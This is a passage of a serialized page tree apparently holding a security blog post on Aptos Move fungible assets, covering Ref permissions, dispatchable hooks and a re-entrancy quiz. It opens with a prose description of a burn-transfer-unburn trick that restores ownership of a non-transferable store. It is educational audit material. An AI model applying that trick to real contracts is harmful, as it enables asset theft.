"type":31,"value":69166}," to",{"type":25,"tag":216,"props":69168,"children":69169},{"style":6964},[69170],{"type":31,"value":6967},{"type":25,"tag":216,"props":69172,"children":69173},{"class":6922,"line":7557},[69174],{"type":25,"tag":216,"props":69175,"children":69176},{"style":6964},[69177],{"type":31,"value":7874},{"type":25,"tag":38,"props":69179,"children":69180},{},[69181,69183,69188,69190,69195],{"type":31,"value":69182},"A user could exploit this by creating an object and a transfer permission, burning the object (changing its ownership to the ",{"type":25,"tag":82,"props":69184,"children":69186},{"className":69185},[],[69187],{"type":31,"value":67840},{"type":31,"value":69189},"), transferring it to another user, and then registering a non-transferable fungible store with that object. While the store could no longer be moved using the owner's ",{"type":25,"tag":82,"props":69191,"children":69193},{"className":69192},[],[69194],{"type":31,"value":11098},{"type":31,"value":69196}," or the transfer permission due to non-transferable restrictions, it could be unburned to restore the original ownership!",{"type":25,"tag":606,"props":69198,"children":69200},{"id":69199},"references",[69201],{"type":31,"value":69202},"References",{"type":25,"tag":38,"props":69204,"children":69205},{},[69206,69211,69213,69219,69221,69226,69228,69233],{"type":25,"tag":82,"props":69207,"children":69209},{"className":69208},[],[69210],{"type":31,"value":69202},{"type":31,"value":69212}," are a permission type resource that authenticate a caller for security-critical operations. ",{"type":25,"tag":82,"props":69214,"children":69216},{"className":69215},[],[69217],{"type":31,"value":69218},"Refs",{"type":31,"value":69220}," are based on the ",{"type":25,"tag":82,"props":69222,"children":69224},{"className":69223},[],[69225],{"type":31,"value":52820},{"type":31,"value":69227}," model, but they are also adapted by fungible assets. Some of these are defined by the ",{"type":25,"tag":82,"props":69229,"children":69231},{"className":69230},[],[69232],{"type":31,"value":52820},{"type":31,"value":69234}," itself, while others are created through the fungible asset module. What's more, some are shared between them, while others appear shared but aren’t.",{"type":25,"tag":38,"props":69236,"children":69237},{},[69238,69240,69245,69247,69252,69253,69259,69261,69266,69268,69273],{"type":31,"value":69239},"Let's get back to the ",{"type":25,"tag":82,"props":69241,"children":69243},{"className":69242},[],[69244],{"type":31,"value":66044},{"type":31,"value":69246}," deletion example. Both ",{"type":25,"tag":82,"props":69248,"children":69250},{"className":69249},[],[69251],{"type":31,"value":67329},{"type":31,"value":1307},{"type":25,"tag":82,"props":69254,"children":69256},{"className":69255},[],[69257],{"type":31,"value":69258},"fungible_asset::remove_store",{"type":31,"value":69260}," use the same object-specific ",{"type":25,"tag":82,"props":69262,"children":69264},{"className":69263},[],[69265],{"type":31,"value":67261},{"type":31,"value":69267}," permission. It can be created only during object creation. There is no separate ",{"type":25,"tag":82,"props":69269,"children":69271},{"className":69270},[],[69272],{"type":31,"value":67261},{"type":31,"value":69274}," for fungible assets.",{"type":25,"tag":206,"props":69276,"children":69277},{"className":6915,"code":67211,"language":6914,"meta":7,"style":7},[69278],{"type":25,"tag":82,"props":69279,"children":69280},{"__ignoreMap":7},[69281,69288,69327,69334,69341],{"type":25,"tag":216,"props":69282,"children":69283},{"class":6922,"line":6923},[69284],{"type":25,"tag":216,"props":69285,"children":69286},{"style":6927},[69287],{"type":31,"value":67223},{"type":25,"tag":216,"props":69289,"children":69290},{"class":6922,"line":6769},[69291,69295,69299,69303,69307,69311,69315,69319,69323],{"type":25,"tag":216,"props":69292,"children":69293},{"style":6947},[69294],{"type":31,"value":65643},{"type":25,"tag":216,"props":69296,"children":69297},{"style":6947},[69298],{"type":31,"value":10158},{"type":25,"tag":216,"props":69300,"children":69301},{"style":7047},[69302],{"type":31,"value":67239},{"type":25,"tag":216,"props":69304,"children":69305},{"style":6964},[69306],{"type":31,"value":1850},{"type":25,"tag":216,"props":69308,"children":69309},{"style":6947},[69310],{"type":31,"value":67248},{"type":25,"tag":216,"props":69312,"children":69313},{"style":6953},[69314],{"type":31,"value":1472},{"type":25,"tag":216,"props":69316,"children":69317},{"style":6953},[69318],{"type":31,"value":11093},{"type":25,"tag":216,"props":69320,"children":69321},{"style":7375},[69322],{"type":31,"value":67261},{"type":25,"tag":216,"props":69324,"children":69325},{"style":6964},[69326],{"type":31,"value":7107},{"type":25,"tag":216,"props":69328,"children":69329},{"class":6922,"line":6778},[69330],{"type":25,"tag":216,"props":69331,"children":69332},{"emptyLinePlaceholder":16},[69333],{"type":31,"value":7642},{"type":25,"tag":216,"props":69335,"children":69336},{"class":6922,"line":7005},[69337],{"type":25,"tag":216,"props":69338,"children":69339},{"style":6927},[69340],{"type":31,"value":67280},{"type":25,"tag":216,"props":69342,"children":69343},{"class":6922,"line":7110},[69344,69348,69352,69356,69360,69364,69368,69372],{"type":25,"tag":216,"props":69345,"children":69346},{"style":6947},[69347],{"type":31,"value":65643},{"type":25,"tag":216,"props":69349,"children":69350},{"style":6947},[69351],{"type":31,"value":10158},{"type":25,"tag":216,"props":69353,"children":69354},{"style":7047},[69355],{"type":31,"value":67296},{"type":25,"tag":216,"props":69357,"children":69358},{"style":6964},[69359],{"type":31,"value":1850},{"type":25,"tag":216,"props":69361,"children":69362},{"style":6936},[69363],{"type":31,"value":67305},{"type":25,"tag":216,"props":69365,"children":69366},{"style":6953},[69367],{"type":31,"value":1472},{"type":25,"tag":216,"props":69369,"children":69370},{"style":7375},[69371],{"type":31,"value":67314},{"type":25,"tag":216,"props":69373,"children":69374},{"style":6964},[69375],{"type":31,"value":7107},{"type":25,"tag":38,"props":69377,"children":69378},{},[69379,69381,69386,69388,69394],{"type":31,"value":69380},"On the other hand, the \"frozen\" status of a ",{"type":25,"tag":82,"props":69382,"children":69384},{"className":69383},[],[69385],{"type":31,"value":66044},{"type":31,"value":69387}," is toggled using a ",{"type":25,"tag":82,"props":69389,"children":69391},{"className":69390},[],[69392],{"type":31,"value":69393},"TransferRef",{"type":31,"value":69395},", which is defined in both models (and not interchangeable). They also can be created only during object creation.",{"type":25,"tag":206,"props":69397,"children":69399},{"className":6915,"code":69398,"language":6914,"meta":7,"style":7},"public fun set_frozen_flag\u003CT: key>(\n    ref: &TransferRef,\n    store: Object\u003CT>,\n    frozen: bool,\n)\n",[69400],{"type":25,"tag":82,"props":69401,"children":69402},{"__ignoreMap":7},[69403,69439,69463,69490,69509],{"type":25,"tag":216,"props":69404,"children":69405},{"class":6922,"line":6923},[69406,69410,69414,69419,69423,69427,69431,69435],{"type":25,"tag":216,"props":69407,"children":69408},{"style":6947},[69409],{"type":31,"value":65643},{"type":25,"tag":216,"props":69411,"children":69412},{"style":6947},[69413],{"type":31,"value":10158},{"type":25,"tag":216,"props":69415,"children":69416},{"style":6947},[69417],{"type":31,"value":69418}," set_frozen_flag",{"type":25,"tag":216,"props":69420,"children":69421},{"style":6964},[69422],{"type":31,"value":9757},{"type":25,"tag":216,"props":69424,"children":69425},{"style":7375},[69426],{"type":31,"value":177},{"type":25,"tag":216,"props":69428,"children":69429},{"style":6953},[69430],{"type":31,"value":1472},{"type":25,"tag":216,"props":69432,"children":69433},{"style":6947},[69434],{"type":31,"value":9883},{"type":25,"tag":216,"props":69436,"children":69437},{"style":6964},[69438],{"type":31,"value":10540},{"type":25,"tag":216,"props":69440,"children":69441},{"class":6922,"line":6769},[69442,69447,69451,69455,69459],{"type":25,"tag":216,"props":69443,"children":69444},{"style":6936},[69445],{"type":31,"value":69446},"    ref",{"type":25,"tag":216,"props":69448,"children":69449},{"style":6953},[69450],{"type":31,"value":1472},{"type":25,"tag":216,"props":69452,"children":69453},{"style":6953},[69454],{"type":31,"value":11093},{"type":25,"tag":216,"props":69456,"children":69457},{"style":7375},[69458],{"type":31,"value":69393},{"type":25,"tag":216,"props":69460,"children":69461},{"style":6964},[69462],{"type":31,"value":7465},{"type":25,"tag":216,"props":69464,"children":69465},{"class":6922,"line":6778},[69466,69470,69474,69478,69482,69486],{"type":25,"tag":216,"props":69467,"children":69468},{"style":6947},[69469],{"type":31,"value":33374},{"type":25,"tag":216,"props":69471,"children":69472},{"style":6953},[69473],{"type":31,"value":1472},{"type":25,"tag":216,"props":69475,"children":69476},{"style":7375},[69477],{"type":31,"value":65529},{"type":25,"tag":216,"props":69479,"children":69480},{"style":6964},[69481],{"type":31,"value":9757},{"type":25,"tag":216,"props":69483,"children":69484},{"style":7375},[69485],{"type":31,"value":177},{"type":25,"tag":216,"props":69487,"children":69488},{"style":6964},[69489],{"type":31,"value":10089},{"type":25,"tag":216,"props":69491,"children":69492},{"class":6922,"line":7005},[69493,69497,69501,69505],{"type":25,"tag":216,"props":69494,"children":69495},{"style":6947},[69496],{"type":31,"value":65181},{"type":25,"tag":216,"props":69498,"children":69499},{"style":6953},[69500],{"type":31,"value":1472},{"type":25,"tag":216,"props":69502,"children":69503},{"style":7375},[69504],{"type":31,"value":16006},{"type":25,"tag":216,"props":69506,"children":69507},{"style":6964},[69508],{"type":31,"value":7465},{"type":25,"tag":216,"props":69510,"children":69511},{"class":6922,"line":7110},[69512],{"type":25,"tag":216,"props":69513,"children":69514},{"style":6964},[69515],{"type":31,"value":7107},{"type":25,"tag":38,"props":69517,"children":69518},{},[69519,69520,69525,69526,69531],{"type":31,"value":474},{"type":25,"tag":82,"props":69521,"children":69523},{"className":69522},[],[69524],{"type":31,"value":52820},{"type":31,"value":10409},{"type":25,"tag":82,"props":69527,"children":69529},{"className":69528},[],[69530],{"type":31,"value":69393},{"type":31,"value":69532}," is used to transfer object ownership:",{"type":25,"tag":206,"props":69534,"children":69536},{"className":6915,"code":69535,"language":6914,"meta":7,"style":7},"/// Used to create LinearTransferRef, hence ownership transfer.\nstruct TransferRef has drop, store {\n    self: address,\n}\n",[69537],{"type":25,"tag":82,"props":69538,"children":69539},{"__ignoreMap":7},[69540,69548,69581,69600],{"type":25,"tag":216,"props":69541,"children":69542},{"class":6922,"line":6923},[69543],{"type":25,"tag":216,"props":69544,"children":69545},{"style":6927},[69546],{"type":31,"value":69547},"/// Used to create LinearTransferRef, hence ownership transfer.\n",{"type":25,"tag":216,"props":69549,"children":69550},{"class":6922,"line":6769},[69551,69555,69560,69564,69569,69573,69577],{"type":25,"tag":216,"props":69552,"children":69553},{"style":6936},[69554],{"type":31,"value":13357},{"type":25,"tag":216,"props":69556,"children":69557},{"style":7375},[69558],{"type":31,"value":69559}," TransferRef",{"type":25,"tag":216,"props":69561,"children":69562},{"style":6947},[69563],{"type":31,"value":13366},{"type":25,"tag":216,"props":69565,"children":69566},{"style":6947},[69567],{"type":31,"value":69568}," drop",{"type":25,"tag":216,"props":69570,"children":69571},{"style":6964},[69572],{"type":31,"value":7026},{"type":25,"tag":216,"props":69574,"children":69575},{"style":6947},[69576],{"type":31,"value":9892},{"type":25,"tag":216,"props":69578,"children":69579},{"style":6964},[69580],{"type":31,"value":7241},{"type":25,"tag":216,"props":69582,"children":69583},{"class":6922,"line":6778},[69584,69588,69592,69596],{"type":25,"tag":216,"props":69585,"children":69586},{"style":6936},[69587],{"type":31,"value":24746},{"type":25,"tag":216,"props":69589,"children":69590},{"style":6953},[69591],{"type":31,"value":1472},{"type":25,"tag":216,"props":69593,"children":69594},{"style":6947},[69595],{"type":31,"value":10201},{"type":25,"tag":216,"props":69597,"children":69598},{"style":6964},[69599],{"type":31,"value":7465},{"type":25,"tag":216,"props":69601,"children":69602},{"class":6922,"line":7005},[69603],{"type":25,"tag":216,"props":69604,"children":69605},{"style":6964},[69606],{"type":31,"value":7874},{"type":25,"tag":38,"props":69608,"children":69609},{},[69610,69612,69617],{"type":31,"value":69611},"While the fungible asset's ",{"type":25,"tag":82,"props":69613,"children":69615},{"className":69614},[],[69616],{"type":31,"value":69393},{"type":31,"value":69618}," manages the transfer of fungible assets and the (un)freezing of fungible stores:",{"type":25,"tag":206,"props":69620,"children":69622},{"className":6915,"code":69621,"language":6914,"meta":7,"style":7},"/// TransferRef can be used to allow or disallow the owner of fungible assets from transferring the asset\n/// and allow the holder of TransferRef to transfer fungible assets from any account.\nstruct TransferRef has drop, store {\n    metadata: Object\u003CMetadata>\n}\n",[69623],{"type":25,"tag":82,"props":69624,"children":69625},{"__ignoreMap":7},[69626,69634,69642,69673,69700],{"type":25,"tag":216,"props":69627,"children":69628},{"class":6922,"line":6923},[69629],{"type":25,"tag":216,"props":69630,"children":69631},{"style":6927},[69632],{"type":31,"value":69633},"/// TransferRef can be used to allow or disallow the owner of fungible assets from transferring the asset\n",{"type":25,"tag":216,"props":69635,"children":69636},{"class":6922,"line":6769},[69637],{"type":25,"tag":216,"props":69638,"children":69639},{"style":6927},[69640],{"type":31,"value":69641},"/// and allow the holder of TransferRef to transfer fungible assets from any account.\n",{"type":25,"tag":216,"props":69643,"children":69644},{"class":6922,"line":6778},[69645,69649,69653,69657,69661,69665,69669],{"type":25,"tag":216,"props":69646,"children":69647},{"style":6936},[69648],{"type":31,"value":13357},{"type":25,"tag":216,"props":69650,"children":69651},{"style":7375},[69652],{"type":31,"value":69559},{"type":25,"tag":216,"props":69654,"children":69655},{"style":6947},[69656],{"type":31,"value":13366},{"type":25,"tag":216,"props":69658,"children":69659},{"style":6947},[69660],{"type":31,"value":69568},{"type":25,"tag":216,"props":69662,"children":69663},{"style":6964},[69664],{"type":31,"value":7026},{"type":25,"tag":216,"props":69666,"children":69667},{"style":6947},[69668],{"type":31,"value":9892},{"type":25,"tag":216,"props":69670,"children":69671},{"style":6964},[69672],{"type":31,"value":7241},{"type":25,"tag":216,"props":69674,"children":69675},{"class":6922,"line":7005},[69676,69680,69684,69688,69692,69696],{"type":25,"tag":216,"props":69677,"children":69678},{"style":6947},[69679],{"type":31,"value":65520},{"type":25,"tag":216,"props":69681,"children":69682},{"style":6953},[69683],{"type":31,"value":1472},{"type":25,"tag":216,"props":69685,"children":69686},{"style":7375},[69687],{"type":31,"value":65529},{"type":25,"tag":216,"props":69689,"children":69690},{"style":6964},[69691],{"type":31,"value":9757},{"type":25,"tag":216,"props":69693,"children":69694},{"style":7375},[69695],{"type":31,"value":65538},{"type":25,"tag":216,"props":69697,"children":69698},{"style":6964},[69699],{"type":31,"value":9943},{"type":25,"tag":216,"props":69701,"children":69702},{"class":6922,"line":7110},[69703],{"type":25,"tag":216,"props":69704,"children":69705},{"style":6964},[69706],{"type":31,"value":7874},{"type":25,"tag":38,"props":69708,"children":69709},{},[69710,69712,69718,69720,69726],{"type":31,"value":69711},"Additionally, there are fungible asset-specific references such as ",{"type":25,"tag":82,"props":69713,"children":69715},{"className":69714},[],[69716],{"type":31,"value":69717},"MintRef",{"type":31,"value":69719}," for minting and ",{"type":25,"tag":82,"props":69721,"children":69723},{"className":69722},[],[69724],{"type":31,"value":69725},"BurnRef",{"type":31,"value":69727}," for burning. These references are used exclusively by the fungible asset model, but they still must be created when the fungible asset object is initialized.",{"type":25,"tag":26,"props":69729,"children":69731},{"id":69730},"dispatchable-fungible-assets",[69732],{"type":31,"value":69733},"Dispatchable fungible assets",{"type":25,"tag":38,"props":69735,"children":69736},{},[69737],{"type":31,"value":69738},"Dispatchable fungible assets enhance the functionality of fungible assets by enabling the overloading of operations like deposits and withdrawals.",{"type":25,"tag":38,"props":69740,"children":69741},{},[69742],{"type":31,"value":69743},"Hooks registered during the creation of a dispatchable fungible asset override the default logic for these operations, allowing for custom features like access control, fee mechanisms, or granular pausing.",{"type":25,"tag":69745,"props":69746,"children":69747},"warning",{},[69748],{"type":25,"tag":38,"props":69749,"children":69750},{},[69751,69753,69759],{"type":31,"value":69752},"Overloading the core fungible asset functions introduces potential security risks; for example, during a deposit, funds may not end up at the intended address. The dispatchable fungible asset API provides functions like ",{"type":25,"tag":82,"props":69754,"children":69756},{"className":69755},[],[69757],{"type":31,"value":69758},"transfer_assert_minimum_deposit",{"type":31,"value":69760}," that can help mitigate such risks.",{"type":25,"tag":38,"props":69762,"children":69763},{},[69764,69766,69771,69773,69780],{"type":31,"value":69765},"Hook functions for dispatchable fungible assets must have the correct type signature. They must also be declared ",{"type":25,"tag":82,"props":69767,"children":69769},{"className":69768},[],[69770],{"type":31,"value":65643},{"type":31,"value":69772}," to ensure ",{"type":25,"tag":162,"props":69774,"children":69777},{"href":69775,"rel":69776},"https://aptos.dev/en/build/smart-contracts/book/package-upgrades#compatibility-rules",[166],[69778],{"type":31,"value":69779},"their signature remains immutable",{"type":31,"value":69781},". An example implementation might look like this:",{"type":25,"tag":206,"props":69783,"children":69785},{"className":6915,"code":69784,"language":6914,"meta":7,"style":7},"public fun withdraw_hook\u003CT: key>(\n    store: Object\u003CT>,\n    amount: u64,\n    transfer_ref: &TransferRef,\n): FungibleAsset {\n    //check paused, gather fees etc.\n    fungible_asset::withdraw_with_ref(transfer_ref, store, amount)\n}\n\npublic fun deposit_hook\u003CT: key>(\n    store: Object\u003CT>,\n    fa: FungibleAsset,\n    transfer_ref: &TransferRef,\n) {\n    //check paused, gather fees etc.\n    fungible_asset::deposit_with_ref(transfer_ref, store, fa);\n}\n",[69786],{"type":25,"tag":82,"props":69787,"children":69788},{"__ignoreMap":7},[69789,69825,69852,69871,69895,69914,69922,69968,69975,69982,70018,70045,70065,70088,70095,70102,70146],{"type":25,"tag":216,"props":69790,"children":69791},{"class":6922,"line":6923},[69792,69796,69800,69805,69809,69813,69817,69821],{"type":25,"tag":216,"props":69793,"children":69794},{"style":6947},[69795],{"type":31,"value":65643},{"type":25,"tag":216,"props":69797,"children":69798},{"style":6947},[69799],{"type":31,"value":10158},{"type":25,"tag":216,"props":69801,"children":69802},{"style":6947},[69803],{"type":31,"value":69804}," withdraw_hook",{"type":25,"tag":216,"props":69806,"children":69807},{"style":6964},[69808],{"type":31,"value":9757},{"type":25,"tag":216,"props":69810,"children":69811},{"style":7375},[69812],{"type":31,"value":177},{"type":25,"tag":216,"props":69814,"children":69815},{"style":6953},[69816],{"type":31,"value":1472},{"type":25,"tag":216,"props":69818,"children":69819},{"style":6947},[69820],{"type":31,"value":9883},{"type":25,"tag":216,"props":69822,"children":69823},{"style":6964},[69824],{"type":31,"value":10540},{"type":25,"tag":216,"props":69826,"children":69827},{"class":6922,"line":6769},[69828,69832,69836,69840,69844,69848],{"type":25,"tag":216,"props":69829,"children":69830},{"style":6947},[69831],{"type":31,"value":33374},{"type":25,"tag":216,"props":69833,"children":69834},{"style":6953},[69835],{"type":31,"value":1472},{"type":25,"tag":216,"props":69837,"children":69838},{"style":7375},[69839],{"type":31,"value":65529},{"type":25,"tag":216,"props":69841,"children":69842},{"style":6964},[69843],{"type":31,"value":9757},{"type":25,"tag":216,"props":69845,"children":69846},{"style":7375},[69847],{"type":31,"value":177},{"type":25,"tag":216,"props":69849,"children":69850},{"style":6964},[69851],{"type":31,"value":10089},{"type":25,"tag":216,"props":69853,"children":69854},{"class":6922,"line":6778},[69855,69859,69863,69867],{"type":25,"tag":216,"props":69856,"children":69857},{"style":6947},[69858],{"type":31,"value":65550},{"type":25,"tag":216,"props":69860,"children":69861},{"style":6953},[69862],{"type":31,"value":1472},{"type":25,"tag":216,"props":69864,"children":69865},{"style":7375},[69866],{"type":31,"value":9811},{"type":25,"tag":216,"props":69868,"children":69869},{"style":6964},[69870],{"type":31,"value":7465},{"type":25,"tag":216,"props":69872,"children":69873},{"class":6922,"line":7005},[69874,69879,69883,69887,69891],{"type":25,"tag":216,"props":69875,"children":69876},{"style":6947},[69877],{"type":31,"value":69878},"    transfer_ref",{"type":25,"tag":216,"props":69880,"children":69881},{"style":6953},[69882],{"type":31,"value":1472},{"type":25,"tag":216,"props":69884,"children":69885},{"style":6953},[69886],{"type":31,"value":11093},{"type":25,"tag":216,"props":69888,"children":69889},{"style":7375},[69890],{"type":31,"value":69393},{"type":25,"tag":216,"props":69892,"children":69893},{"style":6964},[69894],{"type":31,"value":7465},{"type":25,"tag":216,"props":69896,"children":69897},{"class":6922,"line":7110},[69898,69902,69906,69910],{"type":25,"tag":216,"props":69899,"children":69900},{"style":6964},[69901],{"type":31,"value":1888},{"type":25,"tag":216,"props":69903,"children":69904},{"style":6953},[69905],{"type":31,"value":1472},{"type":25,"tag":216,"props":69907,"children":69908},{"style":7375},[69909],{"type":31,"value":65508},{"type":25,"tag":216,"props":69911,"children":69912},{"style":6964},[69913],{"type":31,"value":7241},{"type":25,"tag":216,"props":69915,"children":69916},{"class":6922,"line":7216},[69917],{"type":25,"tag":216,"props":69918,"children":69919},{"style":6927},[69920],{"type":31,"value":69921},"    //check paused, gather fees etc.\n",{"type":25,"tag":216,"props":69923,"children":69924},{"class":6922,"line":7244},[69925,69930,69934,69939,69943,69948,69952,69956,69960,69964],{"type":25,"tag":216,"props":69926,"children":69927},{"style":6964},[69928],{"type":31,"value":69929},"    fungible_asset",{"type":25,"tag":216,"props":69931,"children":69932},{"style":6953},[69933],{"type":31,"value":7438},{"type":25,"tag":216,"props":69935,"children":69936},{"style":7047},[69937],{"type":31,"value":69938},"withdraw_with_ref",{"type":25,"tag":216,"props":69940,"children":69941},{"style":6964},[69942],{"type":31,"value":1850},{"type":25,"tag":216,"props":69944,"children":69945},{"style":6947},[69946],{"type":31,"value":69947},"transfer_ref",{"type":25,"tag":216,"props":69949,"children":69950},{"style":6964},[69951],{"type":31,"value":7026},{"type":25,"tag":216,"props":69953,"children":69954},{"style":6947},[69955],{"type":31,"value":9892},{"type":25,"tag":216,"props":69957,"children":69958},{"style":6964},[69959],{"type":31,"value":7026},{"type":25,"tag":216,"props":69961,"children":69962},{"style":6947},[69963],{"type":31,"value":24266},{"type":25,"tag":216,"props":69965,"children":69966},{"style":6964},[69967],{"type":31,"value":7107},{"type":25,"tag":216,"props":69969,"children":69970},{"class":6922,"line":7257},[69971],{"type":25,"tag":216,"props":69972,"children":69973},{"style":6964},[69974],{"type":31,"value":7874},{"type":25,"tag":216,"props":69976,"children":69977},{"class":6922,"line":7275},[69978],{"type":25,"tag":216,"props":69979,"children":69980},{"emptyLinePlaceholder":16},[69981],{"type":31,"value":7642},{"type":25,"tag":216,"props":69983,"children":69984},{"class":6922,"line":7296},[69985,69989,69993,69998,70002,70006,70010,70014],{"type":25,"tag":216,"props":69986,"children":69987},{"style":6947},[69988],{"type":31,"value":65643},{"type":25,"tag":216,"props":69990,"children":69991},{"style":6947},[69992],{"type":31,"value":10158},{"type":25,"tag":216,"props":69994,"children":69995},{"style":6947},[69996],{"type":31,"value":69997}," deposit_hook",{"type":25,"tag":216,"props":69999,"children":70000},{"style":6964},[70001],{"type":31,"value":9757},{"type":25,"tag":216,"props":70003,"children":70004},{"style":7375},[70005],{"type":31,"value":177},{"type":25,"tag":216,"props":70007,"children":70008},{"style":6953},[70009],{"type":31,"value":1472},{"type":25,"tag":216,"props":70011,"children":70012},{"style":6947},[70013],{"type":31,"value":9883},{"type":25,"tag":216,"props":70015,"children":70016},{"style":6964},[70017],{"type":31,"value":10540},{"type":25,"tag":216,"props":70019,"children":70020},{"class":6922,"line":7305},[70021,70025,70029,70033,70037,70041],{"type":25,"tag":216,"props":70022,"children":70023},{"style":6947},[70024],{"type":31,"value":33374},{"type":25,"tag":216,"props":70026,"children":70027},{"style":6953},[70028],{"type":31,"value":1472},{"type":25,"tag":216,"props":70030,"children":70031},{"style":7375},[70032],{"type":31,"value":65529},{"type":25,"tag":216,"props":70034,"children":70035},{"style":6964},[70036],{"type":31,"value":9757},{"type":25,"tag":216,"props":70038,"children":70039},{"style":7375},[70040],{"type":31,"value":177},{"type":25,"tag":216,"props":70042,"children":70043},{"style":6964},[70044],{"type":31,"value":10089},{"type":25,"tag":216,"props":70046,"children":70047},{"class":6922,"line":7557},[70048,70053,70057,70061],{"type":25,"tag":216,"props":70049,"children":70050},{"style":6947},[70051],{"type":31,"value":70052},"    fa",{"type":25,"tag":216,"props":70054,"children":70055},{"style":6953},[70056],{"type":31,"value":1472},{"type":25,"tag":216,"props":70058,"children":70059},{"style":7375},[70060],{"type":31,"value":65508},{"type":25,"tag":216,"props":70062,"children":70063},{"style":6964},[70064],{"type":31,"value":7465},{"type":25,"tag":216,"props":70066,"children":70067},{"class":6922,"line":7574},[70068,70072,70076,70080,70084],{"type":25,"tag":216,"props":70069,"children":70070},{"style":6947},[70071],{"type":31,"value":69878},{"type":25,"tag":216,"props":70073,"children":70074},{"style":6953},[70075],{"type":31,"value":1472},{"type":25,"tag":216,"props":70077,"children":70078},{"style":6953},[70079],{"type":31,"value":11093},{"type":25,"tag":216,"props":70081,"children":70082},{"style":7375},[70083],{"type":31,"value":69393},{"type":25,"tag":216,"props":70085,"children":70086},{"style":6964},[70087],{"type":31,"value":7465},{"type":25,"tag":216,"props":70089,"children":70090},{"class":6922,"line":7591},[70091],{"type":25,"tag":216,"props":70092,"children":70093},{"style":6964},[70094],{"type":31,"value":18761},{"type":25,"tag":216,"props":70096,"children":70097},{"class":6922,"line":7604},[70098],{"type":25,"tag":216,"props":70099,"children":70100},{"style":6927},[70101],{"type":31,"value":69921},{"type":25,"tag":216,"props":70103,"children":70104},{"class":6922,"line":7613},[70105,70109,70113,70118,70122,70126,70130,70134,70138,70142],{"type":25,"tag":216,"props":70106,"children":70107},{"style":6964},[70108],{"type":31,"value":69929},{"type":25,"tag":216,"props":70110,"children":70111},{"style":6953},[70112],{"type":31,"value":7438},{"type":25,"tag":216,"props":70114,"children":70115},{"style":7047},[70116],{"type":31,"value":70117},"deposit_with_ref",{"type":25,"tag":216,"props":70119,"children":70120},{"style":6964},[70121],{"type":31,"value":1850},{"type":25,"tag":216,"props":70123,"children":70124},{"style":6947},[70125],{"type":31,"value":69947},{"type":25,"tag":216,"props":70127,"children":70128},{"style":6964},[70129],{"type":31,"value":7026},{"type":25,"tag":216,"props":70131,"children":70132},{"style":6947},[70133],{"type":31,"value":9892},{"type":25,"tag":216,"props":70135,"children":70136},{"style":6964},[70137],{"type":31,"value":7026},{"type":25,"tag":216,"props":70139,"children":70140},{"style":6947},[70141],{"type":31,"value":65701},{"type":25,"tag":216,"props":70143,"children":70144},{"style":6964},[70145],{"type":31,"value":7797},{"type":25,"tag":216,"props":70147,"children":70148},{"class":6922,"line":7636},[70149],{"type":25,"tag":216,"props":70150,"children":70151},{"style":6964},[70152],{"type":31,"value":7874},{"type":25,"tag":70154,"props":70155,"children":70156},"question",{},[70157,70184],{"type":25,"tag":38,"props":70158,"children":70159},{},[70160,70162,70168,70170,70176,70177,70183],{"type":31,"value":70161},"Why hook functions rely on ",{"type":25,"tag":82,"props":70163,"children":70165},{"className":70164},[],[70166],{"type":31,"value":70167},"*_with_ref",{"type":31,"value":70169}," calls? What would happen if the hook function called ",{"type":25,"tag":82,"props":70171,"children":70173},{"className":70172},[],[70174],{"type":31,"value":70175},"dispatchable_fungible_asset::withdraw",{"type":31,"value":20751},{"type":25,"tag":82,"props":70178,"children":70180},{"className":70179},[],[70181],{"type":31,"value":70182},"fungible_asset::withdraw_with_ref",{"type":31,"value":604},{"type":25,"tag":70185,"props":70186,"children":70187},"template",{"v-slot:answer-0":7},[70188,70200],{"type":25,"tag":38,"props":70189,"children":70190},{},[70191,70193,70198],{"type":31,"value":70192},"A1: Hook functions rely on ",{"type":25,"tag":82,"props":70194,"children":70196},{"className":70195},[],[70197],{"type":31,"value":70167},{"type":31,"value":70199}," calls because the default fungible asset functions verify if the fungible asset is not dispatchable.",{"type":25,"tag":38,"props":70201,"children":70202},{},[70203,70205,70210],{"type":31,"value":70204},"A2: A ",{"type":25,"tag":82,"props":70206,"children":70208},{"className":70207},[],[70209],{"type":31,"value":70175},{"type":31,"value":70211}," would result in RUNTIME_DISPATCH_ERROR (code 4037) error with error message: \"Re-entrancy detected\".",{"type":25,"tag":38,"props":70213,"children":70214},{},[70215],{"type":31,"value":70216},"In one of our reviews, we encountered a dispatchable fungible asset where the hooked withdrawal set a \"blocked\" flag, which was cleared by the corresponding deposit. This design was used to ensure that each withdrawal was tied to a deposit, effectively preventing simultaneous withdrawals.",{"type":25,"tag":206,"props":70218,"children":70220},{"className":6915,"code":70219,"language":6914,"meta":7,"style":7},"public fun deposit\u003CT: key>(store: Object\u003CT>, fa: FungibleAsset, transfer_ref: &TransferRef) {\n    assert_withdraw_flag(true);\n    [...]\n    set_withdraw_flag(false);\n    fungible_asset::deposit_with_ref(transfer_ref, store, amount);\n    [...]\n    }\n\npublic fun withdraw\u003CT: key>(store: Object\u003CT>, amount: u64, transfer_ref: &TransferRef): FungibleAsset acquires [...] {\n    assert_withdraw_flag(false);\n    [...]\n    set_withdraw_flag(true);\n    fungible_asset::withdraw_with_ref(transfer_ref, store, amount)\n}\n",[70221],{"type":25,"tag":82,"props":70222,"children":70223},{"__ignoreMap":7},[70224,70319,70339,70354,70374,70417,70432,70439,70446,70565,70584,70599,70618,70661],{"type":25,"tag":216,"props":70225,"children":70226},{"class":6922,"line":6923},[70227,70231,70235,70239,70243,70247,70251,70255,70259,70263,70267,70271,70275,70279,70283,70287,70291,70295,70299,70303,70307,70311,70315],{"type":25,"tag":216,"props":70228,"children":70229},{"style":6947},[70230],{"type":31,"value":65643},{"type":25,"tag":216,"props":70232,"children":70233},{"style":6947},[70234],{"type":31,"value":10158},{"type":25,"tag":216,"props":70236,"children":70237},{"style":6947},[70238],{"type":31,"value":65652},{"type":25,"tag":216,"props":70240,"children":70241},{"style":6964},[70242],{"type":31,"value":9757},{"type":25,"tag":216,"props":70244,"children":70245},{"style":7375},[70246],{"type":31,"value":177},{"type":25,"tag":216,"props":70248,"children":70249},{"style":6953},[70250],{"type":31,"value":1472},{"type":25,"tag":216,"props":70252,"children":70253},{"style":6947},[70254],{"type":31,"value":9883},{"type":25,"tag":216,"props":70256,"children":70257},{"style":6964},[70258],{"type":31,"value":11562},{"type":25,"tag":216,"props":70260,"children":70261},{"style":6947},[70262],{"type":31,"value":9892},{"type":25,"tag":216,"props":70264,"children":70265},{"style":6953},[70266],{"type":31,"value":1472},{"type":25,"tag":216,"props":70268,"children":70269},{"style":7375},[70270],{"type":31,"value":65529},{"type":25,"tag":216,"props":70272,"children":70273},{"style":6964},[70274],{"type":31,"value":9757}